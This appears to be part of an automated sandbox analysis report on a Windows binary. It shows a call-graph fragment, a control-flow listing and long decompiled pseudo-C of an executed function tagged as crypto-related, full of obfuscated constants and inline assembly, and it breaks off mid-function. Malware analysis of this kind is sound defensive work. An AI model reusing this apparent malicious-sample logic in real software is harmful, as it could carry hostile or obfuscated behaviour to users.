___scrt_is_nonwritable_in_current_image 14794->14795 14805 afd57a EnterCriticalSection 14795->14805 14797 b00f05 14798 b00f37 14797->14798 14799 b00f2c 14797->14799 14801 afa4ec __dosmaperr 14 API calls 14798->14801 14806 b01004 14799->14806 14802 b00f32 14801->14802 14821 b00f6b 14802->14821 14805->14797 14807 afd651 ___scrt_uninitialize_crt 25 API calls 14806->14807 14810 b01014 14807->14810 14808 b0101a 14824 afd5c0 14808->14824 14810->14808 14812 afd651 ___scrt_uninitialize_crt 25 API calls 14810->14812 14820 b0104c 14810->14820 14811 afd651 ___scrt_uninitialize_crt 25 API calls 14814 b01058 CloseHandle 14811->14814 14813 b01043 14812->14813 14817 afd651 ___scrt_uninitialize_crt 25 API calls 14813->14817 14814->14808 14818 b01064 GetLastError 14814->14818 14815 b01094 14815->14802 14817->14820 14818->14808 14820->14808 14820->14811 14838 afd59d LeaveCriticalSection 14821->14838 14823 b00f54 14823->14791 14825 afd5cf 14824->14825 14826 afd636 14824->14826 14825->14826 14832 afd5f9 14825->14832 14827 afa4ec __dosmaperr 14 API calls 14826->14827 14828 afd63b 14827->14828 14829 afa4d9 __dosmaperr 14 API calls 14828->14829 14830 afd626 14829->14830 14830->14815 14833 afa4b6 14830->14833 14831 afd620 SetStdHandle 14831->14830 14832->14830 14832->14831 14834 afa4d9 __dosmaperr 14 API calls 14833->14834 14835 afa4c1 __dosmaperr 14834->14835 14836 afa4ec __dosmaperr 14 API calls 14835->14836 14837 afa4d4 14836->14837 14837->14815 14838->14823 14839->14778 14840->14758 14219 ae5d5e 14222 ae5d41 __allrem 14219->14222 14220 ae5ce2 14221 af7b30 _ValidateLocalCookies 5 API calls 14223 ae6fef 14221->14223 14222->14220 14224 aee380 ReadFile 14222->14224 14226 ae6341 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 14222->14226 14225 ae66c9 14224->14225 14225->14226 14227 aee380 ReadFile 14225->14227 14226->14221 14227->14226 14273 ae4e55 14274 aedec0 14273->14274 14275 ae4e71 ReadFile 14274->14275 14276 ae4e8f 14275->14276 14277 af7b30 _ValidateLocalCookies 5 API calls 14276->14277 14279 ae4ed0 14276->14279 14278 ae4ecc 14277->14278

          Executed Functions

          Function 00AE2F76 Relevance: 32.8, APIs: 3, Strings: 15, Instructions: 1318COMMONCrypto
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 0 ae2f76-ae33d9 1 ae33e3-ae33f6 0->1 1->1 2 ae33f8-ae3406 1->2 3 ae345b-ae346d 2->3 4 ae3408-ae342e 2->4 6 ae3473-ae34a7 3->6 5 ae3434-ae3446 4->5 5->5 7 ae3448-ae3459 5->7 8 ae34a9-ae34e5 6->8 9 ae34e7-ae350b 6->9 7->6 10 ae3511-ae3521 8->10 9->10 11 ae3563 10->11 12 ae3523-ae354e 10->12 13 ae3569-ae35b0 call aee070 11->13 14 ae3550-ae355f 12->14 18 ae35c6-ae35dd 13->18 19 ae35b2-ae35c5 call af7b30 13->19 14->14 16 ae3561 14->16 16->13 21 ae35e0-ae35e9 18->21 21->21 23 ae35eb-ae3621 21->23 24 ae366b-ae37fc call aeeae0 * 2 call aeedf0 call aeeb70 * 2 23->24 25 ae3623-ae3665 23->25 36 ae37fe-ae380a 24->36 37 ae380f-ae3838 24->37 25->24 38 ae46fd 36->38 39 ae383e-ae39ac call aed7d0 * 2 call aeed60 call af8bb0 * 2 37->39 40 ae3a70-ae3c16 call aed7d0 * 2 call aeed60 call af8bb0 * 2 37->40 41 ae4703-ae4737 38->41 77 ae3a3c-ae3a6b 39->77 78 ae39b2-ae39e0 39->78 75 ae3c18-ae3c36 40->75 76 ae3c54-ae3c6d 40->76 44 ae4740-ae474a 41->44 44->44 47 ae474c-ae4760 44->47 50 ae478e-ae479b 47->50 51 ae4762-ae4788 47->51 54 ae47a0-ae47a9 50->54 51->50 54->54 57 ae47ab-ae47b4 call aee110 54->57 63 ae47b9-ae47c8 57->63 67 ae47dc-ae47ee call af7b30 63->67 68 ae47ca-ae47cd 63->68 71 ae47d0-ae47da 68->71 71->67 71->71 75->41 79 ae3c3c-ae3c4f 75->79 80 ae3c77-ae3c91 76->80 77->80 78->38 81 ae39e6-ae3a37 78->81 79->41 82 ae3cf7-ae3d2f call aeecd0 80->82 83 ae3c93-ae3cc7 80->83 81->38 88 ae3d67-ae3d70 82->88 89 ae3d31-ae3d62 82->89 84 ae3cd0-ae3ce9 83->84 84->84 86 ae3ceb-ae3cf1 84->86 86->82 90 ae3db7-ae3dc2 88->90 91 ae3d72-ae3db5 88->91 89->38 92 ae3dc8-ae3dec 90->92 91->92 93 ae3df0-ae3dff 92->93 93->93 94 ae3e01-ae3e2b 93->94 95 ae3e30-ae3e39 94->95 95->95 96 ae3e3b-ae3e47 95->96 97 ae3e8e-ae3f81 call aed7d0 call aeefe0 call af8bb0 96->97 98 ae3e49-ae3e7a 96->98 107 ae3f87-ae3fd8 97->107 108 ae4020-ae402a 97->108 99 ae3e80-ae3e86 98->99 99->99 101 ae3e88 99->101 101->97 111 ae400d-ae401b 107->111 112 ae3fda-ae4008 107->112 109 ae402c-ae405c 108->109 110 ae4087-ae41bb call aeeae0 * 2 call aeedf0 call aeeb70 call b03060 call aeeb70 108->110 113 ae4062-ae4073 109->113 127 ae41bd-ae420d 110->127 128 ae4212-ae421a 110->128 111->41 112->41 113->113 115 ae4075-ae4081 113->115 115->110 127->38 129 ae428f-ae433f call b030d0 128->129 130 ae421c-ae421e 128->130 133 ae4346-ae43d7 call aeeae0 * 2 129->133 130->129 131 ae4220-ae428a 130->131 131->133 139 ae443b-ae443e 133->139 140 ae43d9 133->140 141 ae4444-ae446c call aeef50 139->141 142 ae43df-ae43ee 140->142 143 ae43db-ae43dd 140->143 147 ae4471-ae4487 141->147 144 ae43f0-ae4425 142->144 143->139 143->142 144->144 146 ae4427 144->146 148 ae442d-ae4439 146->148 149 ae4429-ae442b 146->149 150 ae44fa-ae4513 call aeeb70 147->150 151 ae4489-ae44f3 147->151 148->141 149->144 149->148 154 ae4555-ae456c call aeeb70 150->154 155 ae4515-ae4537 150->155 151->150 159 ae456e 154->159 160 ae45e0-ae45e7 154->160 156 ae4540-ae4553 155->156 156->154 156->156 161 ae4574-ae458b 159->161 162 ae4570-ae4572 159->162 163 ae45e9-ae465b 160->163 164 ae4660-ae468c call ae2ea0 160->164 165 ae4590-ae45d8 161->165 162->160 162->161 163->38 170 ae468e-ae4692 164->170 171 ae46a5-ae46f2 call b030d0 164->171 165->165 167 ae45da 165->167 167->160 169 ae45dc-ae45de 167->169 169->160 169->165 170->171 172 ae4694-ae46a3 170->172 175 ae46f8 171->175 172->175 175->38
          C-Code - Quality: 81%
          			E00AE2F76(void* __eax, void* __edi) {
				signed int _t628;
				char _t631;
				char _t632;
				unsigned int _t638;
				char _t640;
				char _t641;
				signed int _t642;
				char _t645;
				char _t647;
				intOrPtr _t650;
				intOrPtr _t652;
				intOrPtr _t654;
				intOrPtr _t655;
				intOrPtr _t662;
				char _t664;
				short _t669;
				short _t671;
				void* _t676;
				void* _t677;
				signed int _t680;
				void* _t684;
				signed int _t685;
				void* _t686;
				signed int _t688;
				signed char _t690;
				signed int _t692;
				signed char _t693;
				signed int _t695;
				signed char _t697;
				signed int _t700;
				signed int _t707;
				signed int _t711;
				signed char _t712;
				signed char _t716;
				short _t721;
				signed int _t725;
				short _t731;
				signed int _t733;
				signed char _t740;
				signed int _t748;
				signed char _t752;
				signed int _t753;
				void* _t755;
				signed int _t762;
				signed int _t772;
				signed int _t774;
				signed int _t792;
				intOrPtr _t793;
				signed short _t794;
				signed int _t797;
				signed int _t802;
				signed int _t804;
				signed int _t815;
				signed int _t823;
				void* _t831;
				signed int _t833;
				signed int _t837;
				signed int _t839;
				void* _t840;
				void* _t845;
				signed int _t857;
				signed int _t859;
				signed int _t873;
				signed int _t876;
				signed char _t892;
				signed char _t893;
				signed int _t906;
				signed char _t916;
				signed short _t926;
				signed int _t931;
				signed int _t937;
				short _t953;
				signed char _t964;
				signed int _t967;
				signed char _t970;
				signed int _t973;
				signed int _t974;
				signed char _t977;
				void* _t979;
				signed int _t981;
				signed int _t982;
				signed char _t984;
				signed int _t987;
				signed int _t988;
				signed int _t991;
				signed char _t992;
				signed char _t993;
				signed char _t994;
				signed short _t997;
				void* _t998;
				signed char _t999;
				signed char _t1000;
				char _t1005;
				void* _t1010;
				unsigned int _t1011;
				signed int _t1015;
				signed int _t1016;
				signed int _t1017;
				signed char _t1019;
				signed int _t1020;
				signed int _t1021;
				short _t1039;
				char _t1040;
				signed int _t1041;
				signed int _t1043;
				signed int _t1044;
				signed int _t1046;
				signed int _t1047;
				signed int _t1050;
				signed short _t1055;
				signed char _t1070;
				signed int _t1075;
				void* _t1078;
				void* _t1082;
				signed int _t1084;
				signed char _t1086;
				signed int _t1092;
				signed int _t1109;
				intOrPtr _t1110;
				signed int _t1118;
				short _t1121;
				signed int _t1126;
				signed char _t1127;
				signed char _t1130;
				signed int _t1132;
				signed short _t1138;
				signed int _t1149;
				signed int _t1150;
				signed char _t1153;
				signed int _t1160;
				void* _t1163;
				signed char _t1164;
				unsigned int _t1174;
				signed int _t1178;
				char _t1180;
				signed int _t1183;
				signed int _t1186;
				signed int _t1187;
				signed int _t1189;
				signed int _t1190;
				signed int _t1191;
				signed int _t1193;
				signed int _t1194;
				short _t1201;
				signed int _t1203;
				signed int _t1204;
				signed int _t1206;
				signed char _t1211;
				signed int _t1214;
				signed char _t1220;
				signed int _t1221;
				char _t1227;
				void* _t1230;
				signed int _t1231;
				short _t1232;
				void* _t1233;
				signed int _t1236;
				signed int _t1237;
				signed short _t1238;
				signed int _t1244;
				signed int _t1248;
				short _t1251;
				signed int _t1252;
				signed int _t1255;
				signed short _t1257;
				signed short _t1260;
				signed int _t1267;
				signed int _t1269;
				signed int _t1270;
				intOrPtr _t1271;
				signed int _t1272;
				short _t1273;
				void* _t1277;
				signed int _t1278;
				void* _t1282;
				void* _t1283;
				void* _t1288;
				void* _t1289;
				void* _t1292;
				void* _t1293;
				void* _t1294;

				_push(es);
				asm("fild word [edx-0x16]");
				_push(__edi);
				_t628 = __eax - 0xc0;
				_push(_t628);
				_t1278 = _t628;
				asm("sbb al, 0xf3");
				asm("movd [0xb089ac], mm0");
				 *(_t1278 - 0x188) = _t1277 - 0x53;
				_t631 =  *0xb089b4; // 0x0
				 *((char*)(_t1278 - 0x1b8)) = _t631;
				_t1230 = 0x42c8;
				_t632 =  *0xb089c0; // 0x0
				 *((char*)(_t1278 - 0x1c4)) = _t632;
				 *(_t1278 - 0x137) = 0xea;
				 *(_t1278 - 0x13d) = 0x1d;
				 *(_t1278 - 0x187) = 0x1e;
				 *(_t1278 - 0x12e) = 0x7b;
				 *(_t1278 - 0x12f) = 0x54;
				_t638 = "oNGiBx"; // 0x69474e6f
				 *((intOrPtr*)(_t1278 - 0x1d4)) = _t638;
				 *((short*)(_t1278 - 0x1d0)) =  *0xb089d0 & 0x0000ffff;
				_t640 =  *0xb089d2; // 0x0
				 *((char*)(_t1278 - 0x1ce)) = _t640;
				_t641 =  *0xb089dc; // 0x0
				 *((char*)(_t1278 - 0x15c)) = _t641;
				_t642 =  *"crops"; // 0x706f7263
				 *(_t1278 - 0x158) = _t642;
				 *(_t1278 - 0x154) =  *0xb089e4 & 0x0000ffff;
				asm("movq [ebp-0x1c0], xmm0");
				asm("movq xmm0, [0xb089b8]");
				 *((short*)(_t1278 - 0x17c)) =  *0xb089f0 & 0x0000ffff;
				_t645 =  *0xb089f2; // 0x0
				asm("movq [ebp-0x1cc], xmm0");
				asm("movq xmm0, [0xb089c4]");
				 *((char*)(_t1278 - 0x17a)) = _t645;
				asm("movq [ebp-0x1dc], xmm0");
				asm("movq xmm0, [0xb089d4]");
				 *((short*)(_t1278 - 0x168)) =  *0xb089fc & 0x0000ffff;
				_t647 =  *0xb089fe; // 0x0
				asm("movq [ebp-0x164], xmm0");
				asm("movq xmm0, [0xb089e8]");
				 *((char*)(_t1278 - 0x166)) = _t647;
				asm("movq [ebp-0x184], xmm0");
				asm("movq xmm0, [0xb089f4]");
				 *((intOrPtr*)(_t1278 - 0x2c8)) = 0x51cd;
				 *((intOrPtr*)(_t1278 - 0x1ec)) = 0xe55a309d;
				 *((short*)(_t1278 - 0x1e8)) = 0xf2e6;
				 *((intOrPtr*)(_t1278 - 0x1e5)) = 0x93871c77;
				 *((short*)(_t1278 - 0x1e1)) = 0x6fbe;
				 *((char*)(_t1278 - 0x1de)) = 0;
				 *((intOrPtr*)(_t1278 - 0x1ac)) = 0x99d61dea;
				 *((intOrPtr*)(_t1278 - 0x1a8)) = 0x547b991e;
				 *((char*)(_t1278 - 0x1a4)) = 0;
				asm("movq [ebp-0x170], xmm0");
				 *((intOrPtr*)(_t1278 - 0x2dc)) = 0x4fd451cd;
				 *((intOrPtr*)(_t1278 - 0x2d8)) = 0x26b34cd8;
				 *((intOrPtr*)(_t1278 - 0x2d4)) = 0x53f643d8;
				 *((intOrPtr*)(_t1278 - 0x2d0)) = 0x3e7475e4;
				 *((short*)(_t1278 - 0x2cc)) = 0;
				 *((short*)(_t1278 - 0x20c)) = 0;
				_t979 = 0x2247;
				_t650 =  *0xb08a18; // 0x760044
				_t1251 = 0x3a40;
				 *((intOrPtr*)(_t1278 - 0x324)) = _t650;
				 *((short*)(_t1278 - 0x320)) =  *0xb08a1c & 0x0000ffff;
				_t652 =  *0xb08a30; // 0x480053
				 *((intOrPtr*)(_t1278 - 0x2ec)) = _t652;
				asm("movups xmm0, [0xb08a00]");
				 *((short*)(_t1278 - 0x2e8)) =  *0xb08a34 & 0x0000ffff;
				_t654 =  *0xb08a40; // 0x41
				 *((intOrPtr*)(_t1278 - 0x21c)) = _t654;
				_t655 =  *0xb08a54; // 0x560048
				 *((intOrPtr*)(_t1278 - 0x30c)) = _t655;
				 *((short*)(_t1278 - 0x308)) =  *0xb08a58 & 0x0000ffff;
				 *(_t1278 - 0x1b0) = 0x5620;
				_t1011 = "rAE2QR"; // 0x32454172
				 *((short*)(_t1278 - 0x260)) = 0;
				 *(_t1278 - 0x18c) = 0x7be1;
				 *(_t1278 - 0x254) = 0x5977;
				 *(_t1278 - 0x1b4) = 0x62a8;
				_t662 =  *0xb08a6c; // 0x71
				asm("movups [ebp-0x33c], xmm0");
				 *((intOrPtr*)(_t1278 - 0x27c)) = _t662;
				asm("movq xmm0, [0xb08a10]");
				 *(_t1278 - 0x2e0) =  *0xb08a74 & 0x0000ffff;
				_t664 =  *0xb08a76; // 0x0
				asm("movq [ebp-0x32c], xmm0");
				asm("movups xmm0, [0xb08a20]");
				 *((char*)(_t1278 - 0x2de)) = _t664;
				asm("movups [ebp-0x2fc], xmm0");
				asm("movq xmm0, [0xb08a38]");
				asm("movq [ebp-0x224], xmm0");
				asm("movups xmm0, [0xb08a44]");
				 *(_t1278 - 0x2e4) = _t1011;
				 *((char*)(_t1278 - 0x2df)) = ( *(_t1278 - 0x2e0) >> 8) - 1;
				asm("movups [ebp-0x31c], xmm0");
				asm("movups xmm0, [0xb08a5c]");
				_t669 = (_t1011 >> 0x00000008 & 0x000000ff) + 0x3cce;
				 *((intOrPtr*)(_t1278 - 0x218)) = 0x3cce5456;
				 *((intOrPtr*)(_t1278 - 0x214)) = 0x259e21fc;
				 *((intOrPtr*)(_t1278 - 0x210)) = 0x616d1468;
				 *(_t1278 - 0x278) = 0x66726bd3;
				 *((intOrPtr*)(_t1278 - 0x274)) = 0xe7e12f4;
				 *(_t1278 - 0x270) = 0x582e5620;
				 *((intOrPtr*)(_t1278 - 0x26c)) = 0x13667013;
				 *((intOrPtr*)(_t1278 - 0x268)) = 0x68ee58d8;
				 *((intOrPtr*)(_t1278 - 0x264)) = 0x10450b59;
				 *(_t1278 - 0x2a8) = 0x22477be1;
				 *((intOrPtr*)(_t1278 - 0x2a4)) = 0x59774a82;
				 *((intOrPtr*)(_t1278 - 0x2a0)) = 0x547b47d4;
				 *((intOrPtr*)(_t1278 - 0x29c)) = 0x66fe6afe;
				 *((intOrPtr*)(_t1278 - 0x298)) = 0x159a;
				 *((intOrPtr*)(_t1278 - 0x2c4)) = 0x36a341e9;
				 *((intOrPtr*)(_t1278 - 0x2c0)) = 0x2f0931d5;
				 *(_t1278 - 0x2ba) = 0x54596294;
				 *((intOrPtr*)(_t1278 - 0x2b6)) = 0x50c324b8;
				 *((intOrPtr*)(_t1278 - 0x2b2)) = 0x22c90a9e;
				 *((intOrPtr*)(_t1278 - 0x2ae)) = 0x4a06;
				 *(_t1278 - 0x1fc) = 0x62a84f58;
				 *((intOrPtr*)(_t1278 - 0x1f8)) = 0x7f41201d;
				 *((intOrPtr*)(_t1278 - 0x1f4)) = 0x23626237;
				 *((intOrPtr*)(_t1278 - 0x1f0)) = 0x202b;
				asm("movups [ebp-0x28c], xmm0");
				 *((short*)(_t1278 - 0x226)) = _t669;
				 *((short*)(_t1278 - 0x318)) = _t669;
				_t671 =  *((intOrPtr*)(_t1278 - 0x224)) + 1;
				 *((short*)(_t1278 - 0x14a)) = _t671;
				 *((short*)(_t1278 - 0x224)) = _t671;
				 *(_t1278 - 0x208) = 0x18a8;
				 *(_t1278 - 0x130) = 0x41;
				 *((char*)(_t1278 - 0x1df)) = 0x42;
				_t1015 =  *(_t1278 - 0x16a);
				 *((short*)(_t1278 - 0x176)) = 0x18;
				 *((short*)(_t1278 - 0x2f8)) = 0x18;
				 *((char*)(_t1278 - 0x1e6)) =  *((intOrPtr*)(_t1278 - 0x2fc));
				_t94 = _t1230 - 5; // 0x42c3
				_t676 = _t94;
				 *(_t1278 - 0x22c) = 0;
				do {
					_t1251 = _t1251 + 0xffff;
					_t676 = _t676 + 1;
					_t1015 = _t1015 + 1;
					 *((short*)(_t1278 - 0x2bc)) = _t1251;
				} while (_t676 < 0x42c8);
				_t677 = 0x2247;
				 *(_t1278 - 0x16a) = _t1015;
				if(0x2247 <= 0x2243) {
					 *(_t1278 - 0x131) =  *(_t1278 - 0x162);
					 *(_t1278 - 0x134) =  *(_t1278 - 0x169);
				} else {
					_t99 = _t677 - 0x2243; // 0x2081
					_t1010 = _t99;
					_t1153 =  *(_t1278 - 0x169);
					_t1227 =  *((intOrPtr*)(_t1278 - 0x16e));
					 *(_t1278 - 0x131) = _t1153;
					 *(_t1278 - 0x162) = _t1153;
					goto L4;
					L4:
					_t977 = _t1153;
					_t1227 = _t1227 + _t977;
					_t1153 = _t1153 + (_t977 << 2);
					 *(_t1278 - 0x169) = _t1153;
					_t1010 = _t1010 - 1;
					if(_t1010 != 0) {
						goto L4;
					} else {
						 *((char*)(_t1278 - 0x16e)) = _t1227;
						_t979 = 0x2247;
						 *(_t1278 - 0x134) = _t1153;
					}
				}
				_t1160 =  *(_t1278 - 0x16c) & 0x000000ff;
				_t680 =  *(_t1278 - 0x28c);
				_t1016 =  *(_t1278 - 0x286);
				 *(_t1278 - 0x12c) = 0;
				 *(_t1278 - 0x190) = _t1160;
				 *(_t1278 - 0x19c) = _t1016;
				 *(_t1278 - 0x172) = _t680;
				if(_t1160 <= 1) {
					_t1230 = 0x42c9;
					_t1252 = 0;
					__eflags = 0;
					 *((short*)(_t1278 - 0x2a6)) = _t979 + 0xffff;
					_t981 = 0x304;
					 *(_t1278 - 0x148) = 0xffff;
				} else {
					 *(_t1278 - 0x1b0) = _t680;
					 *(_t1278 - 0x270) = _t680;
					_t973 =  *(_t1278 - 0x2ba) + _t1016;
					 *(_t1278 - 0x158) =  *(_t1278 - 0x158) - 1;
					_t1150 =  *(_t1278 - 0x15e) & 0x000000ff;
					 *(_t1278 - 0x148) = _t973;
					 *(_t1278 - 0x288) = _t973;
					_t974 = _t1160;
					asm("cdq");
					_t1252 = _t974 % _t1150;
					_t981 = _t974 / _t1150;
				}
				_t1017 =  *(_t1278 - 0x17e) & 0x000000ff;
				_t683 =  *(_t1278 - 0x17b);
				if(_t1017 <= 0x6b) {
					 *(_t1278 - 0x136) = _t683;
				} else {
					_t1149 = _t1017 + 0xffffff95;
					_t970 = _t683 + _t1149;
					 *(_t1278 - 0x136) = _t970;
					 *(_t1278 - 0x17b) = _t970;
					 *(_t1278 - 0x148) =  *(_t1278 - 0x148) + _t1149 * 0x1ef2;
					_t683 =  *(_t1278 - 0x148);
					 *(_t1278 - 0x288) =  *(_t1278 - 0x148);
					do {
						_t1230 = _t1230 + 0xffffffff;
						asm("adc edx, 0xffffffff");
						_t981 = _t981 + 1;
						asm("adc esi, 0x0");
						_t1149 = _t1149 - 1;
					} while (_t1149 != 0);
				}
				_t684 = E00AEE070(_t683, 0, 0x400, 0x1000, 0x204); // executed
				_t1019 =  *(_t1278 - 0x2a2);
				_t1282 = 0xffffffffb04c878f;
				_t982 = _t981 + 1;
				 *(_t1278 - 0x135) = _t1019;
				_t1163 = _t684;
				 *(_t1278 - 0x144) = _t982;
				asm("adc esi, 0x0");
				 *(_t1278 - 0x150) = _t1163;
				 *(_t1278 - 0x198) = _t1252;
				 *(_t1278 - 0x17e) = _t1019;
				if(_t1163 != 0) {
					_t151 = _t1230 + 1; // 0x42ca
					_t685 = _t151;
					_t1020 = 0x400;
					 *(_t1278 - 0x258) = _t685;
					 *(_t1278 - 0x278) = _t685;
					_t686 = _t1163;
					do {
						 *_t686 = 0;
						_t686 = _t686 + 1;
						_t1020 = _t1020 - 1;
						__eflags = _t1020;
					} while (_t1020 != 0);
					_t1021 =  *((intOrPtr*)(_t1278 - 0x164));
					_t1164 =  *((intOrPtr*)(_t1278 - 0x1f8));
					 *((short*)(_t1278 - 0x2a4)) = 3;
					_t688 =  *(_t1278 - 0x131) & 0x000000ff;
					 *(_t1278 - 0x1a0) = _t688;
					 *(_t1278 - 0x13b) = _t1021;
					 *(_t1278 - 0x138) = _t1164;
					__eflags = _t688 - 0x3317;
					if(_t688 >= 0x3317) {
						 *((short*)(_t1278 - 0x274)) = 0x12f5;
						 *((char*)(_t1278 - 0x161)) =  *((intOrPtr*)(_t1278 - 0x2c4)) -  *(_t1278 - 0x28c) - _t1021;
						_t964 =  *(_t1278 - 0x1fc) - 0x58 +  *((intOrPtr*)(_t1278 - 0x2bc));
						 *(_t1278 - 0x134) = _t964;
						 *(_t1278 - 0x169) = _t964;
						_t967 = _t982 + _t982 + _t1164;
						__eflags = _t967;
						 *(_t1278 - 0x16a) = _t967;
					}
					E00AEEAE0(_t982, 0xb0d5d0, _t1230, _t1252);
					_t690 =  *(_t1278 - 0x154);
					 *(_t1278 - 0x132) = _t690;
					_t692 = (_t690 & 0x000000ff) * 0x6672;
					 *(_t1278 - 0x240) = _t692;
					 *(_t1278 - 0x28a) = _t692;
					_t693 =  *((intOrPtr*)(_t1278 - 0x16f));
					 *(_t1278 - 0x139) = _t693;
					_t1231 = _t693 & 0x000000ff;
					_t695 = ( *(_t1278 - 0x180) & 0x000000ff) * _t1231;
					 *(_t1278 - 0x194) = _t695;
					 *(_t1278 - 0x276) = _t695;
					E00AEEAE0(_t982, 0xb0d5b0, _t1231, _t1252);
					_t697 =  *((intOrPtr*)(_t1278 - 0x168));
					 *(_t1278 - 0x186) = _t697;
					 *((short*)(_t1278 - 0x2c4)) = (_t697 & 0x000000ff) + 0x4f58;
					 *((short*)(_t1278 - 0x26e)) =  *(_t1278 - 0x190) % ( *(_t1278 - 0x180) & 0x000000ff);
					_push(0);
					_push(0x20);
					 *(_t1278 - 0x148) = 0x4f58;
					 *(_t1278 - 0x1fc) = 0x4f59;
					_t700 = E00AEEDF0(_t982,  *((intOrPtr*)(_t1278 - 0x204)),  *(_t1278 - 0x150), _t1231, 0x4f59);
					_t1283 = _t1282 + 8;
					_t984 = ( *(_t1278 - 0x172) & 0x0000ffff) +  *(_t1278 - 0x1a0);
					_t1255 = _t700;
					E00AEEB70(_t984, 0xb0d5b0, _t1231, _t1255);
					 *((char*)(_t1278 - 0x167)) = (_t984 & 0x000000ff) * ( *(_t1278 - 0x286) & 0x000000ff);
					asm("cdq");
					asm("adc edx, 0x0");
					 *(_t1278 - 0x144) =  *(_t1278 - 0x144) + ( *(_t1278 - 0x139) & 0x000000ff) + 0x11aa;
					asm("adc [ebp-0x198], edx");
					 *((intOrPtr*)(_t1278 - 0x244)) = 0x131d4;
					 *((short*)(_t1278 - 0x2c0)) = 0x131d4;
					_t707 = (_t984 & 0x000000ff) * 0xaa;
					 *(_t1278 - 0x304) = _t707;
					 *(_t1278 - 0x158) = _t707;
					E00AEEB70(_t984, 0xb0d5d0, _t1231, _t1255);
					_t711 =  *(_t1278 - 0x144) + _t984 +  *(_t1278 - 0x1fa);
					 *(_t1278 - 0x185) = _t711;
					_t986 = _t984 -  *(_t1278 - 0x19c) + _t1231;
					 *(_t1278 - 0x160) = _t711;
					_t712 =  *(_t1278 - 0x16d);
					 *(_t1278 - 0x133) = _t712;
					 *(_t1278 - 0x2ba) = _t984 -  *(_t1278 - 0x19c) + _t1231;
					 *((short*)(_t1278 - 0x2a6)) = (_t712 & 0x000000ff) + 0xe7e;
					__eflags = _t1255;
					 *((char*)(_t1278 - 0x12d)) =  *((intOrPtr*)(_t1278 - 0x1cb));
					if(_t1255 == 0) {
						_t716 =  *(_t1278 - 0x155) - 1;
						__eflags =  *(_t1278 + 0x1c);
						 *(_t1278 - 0x171) = _t716;
						 *(_t1278 - 0x155) = _t716;
						 *((char*)(_t1278 - 0x13a)) =  *((intOrPtr*)(_t1278 - 0x2f4));
						if( *(_t1278 + 0x1c) == 0) {
							E00AED7D0(_t986, 0xb0b8d4, 0x20, _t1231, _t1255,  *0xb0d720,  *0xb0d724, _t1278 - 0xb0);
							 *(_t1278 - 0x1bb) =  *(_t1278 - 0x1bb) + 0xb0;
							_t721 =  *((intOrPtr*)(_t1278 - 0x176)) + 0x682e;
							 *((short*)(_t1278 - 0x176)) = _t721;
							 *((short*)(_t1278 - 0x2f8)) = _t721;
							 *((char*)(_t1278 - 0x1ac)) =  *(_t1278 - 0x137) + 0xfb;
							_t725 =  *(_t1278 - 0x1d6) + 0xf6;
							 *(_t1278 - 0x12e) = _t725;
							 *(_t1278 - 0x1d6) = _t725;
							E00AED7D0(_t986, 0xb0b914, 0x1a, _t1231, _t1255,  *0xb0d720,  *0xb0d724, _t1278 - 0x38);
							_push(0);
							 *((char*)(_t1278 - 0x1d8)) = ( *(_t1278 - 0x1cf) & 0x000000ff) * 0x5f;
							_t731 =  *((intOrPtr*)(_t1278 - 0x14a)) + 0xea6;
							 *((short*)(_t1278 - 0x14a)) = _t731;
							 *((short*)(_t1278 - 0x224)) = _t731;
							_push(0x40);
							_push(_t1278 - 0xb0);
							_t733 = E00AEED60(_t986,  *((intOrPtr*)(_t1278 - 0x25c)), _t1278 - 0x38, _t1231, _t1255);
							_t1174 = "MDv3aP"; // 0x3376444d
							_t1039 =  *0xb08a90; // 0x5061
							 *(_t1278 - 0x208) = 0x24604;
							 *(_t1278 - 0x294) = _t1174;
							 *((short*)(_t1278 - 0x290)) = _t1039;
							_t1040 =  *0xb08a92; // 0x0
							 *((char*)(_t1278 - 0x28f)) =  *((intOrPtr*)(_t1278 - 0x2d6)) +  *(_t1278 - 0x294);
							 *((char*)(_t1278 - 0x28e)) = _t1040;
							 *(_t1278 - 0x22c) = 0;
							 *((char*)(_t1278 - 0x293)) = (_t1174 >> 8) + 1;
							E00AF8BB0(_t1231, _t1278 - 0x38, 0, 0x34);
							_t987 =  *(_t1278 - 0x13d) & 0x000000ff;
							_t740 =  *(_t1278 - 0x1c5) - 1;
							 *(_t1278 - 0x130) = _t740;
							 *(_t1278 - 0x1c5) = _t740;
							 *((char*)(_t1278 - 0x1d5)) =  *((intOrPtr*)(_t1278 - 0x218)) + 1 +  *((intOrPtr*)(_t1278 - 0x13a));
							 *((short*)(_t1278 - 0x218)) =  *((intOrPtr*)(_t1278 - 0x214)) + 0x4605;
							E00AF8BB0(_t1231, _t1278 - 0xb0, 0, 0x40);
							_t748 =  *(_t1278 - 0x1c6) & 0x000000ff;
							_t1288 = _t1283 + 0x3c;
							 *(_t1278 - 0x19c) = _t748;
							 *((char*)(_t1278 - 0x1e3)) = 6;
							__eflags = _t733;
							if(_t733 == 0) {
								_t1232 = 0x21fc;
								_t1257 =  *(_t1278 - 0x222);
								_t988 = _t987 - 1;
								__eflags = _t988;
								 *((char*)(_t1278 - 0x1ec)) = _t748 +  *((intOrPtr*)(_t1278 - 0x1d1));
								 *(_t1278 - 0x1a0) = 0x5f;
								goto L32;
							} else {
								_t999 =  *((intOrPtr*)(_t1278 - 0x12d));
								_t1273 = 0xfffffffc;
								 *((char*)(_t1278 - 0x1df)) = 0x61;
								__eflags = 1 -  *((intOrPtr*)(_t1278 - 0x2fa));
								if(1 >  *((intOrPtr*)(_t1278 - 0x2fa))) {
									 *((short*)(_t1278 - 0x33a)) = 1;
									 *((intOrPtr*)(_t1278 - 0x31a)) =  *((intOrPtr*)(_t1278 - 0x31a)) + 0xffff;
								}
							}
						} else {
							E00AED7D0(_t986, 0xb0b8f4, 0x20, _t1231, _t1255,  *0xb0d720,  *0xb0d724, _t1278 - 0xf0);
							_t1248 =  *(_t1278 - 0x222) & 0x0000ffff;
							 *(_t1278 - 0x1a0) = 0x4fd;
							E00AED7D0(_t986, 0xb0b914, 0x1a, _t1248, _t1255,  *0xb0d720,  *0xb0d724, _t1278 - 0x6c);
							_t1138 = ( *(_t1278 - 0x1d3) & 0x000000ff) + ( *(_t1278 - 0x1dc) & 0x000000ff) + 0x26b3;
							 *(_t1278 - 0x190) = _t1138 & 0x0000ffff;
							_t926 =  *(_t1278 - 0x2f6) + 1;
							 *(_t1278 - 0x13e) = _t1138;
							 *(_t1278 - 0x222) = _t1138;
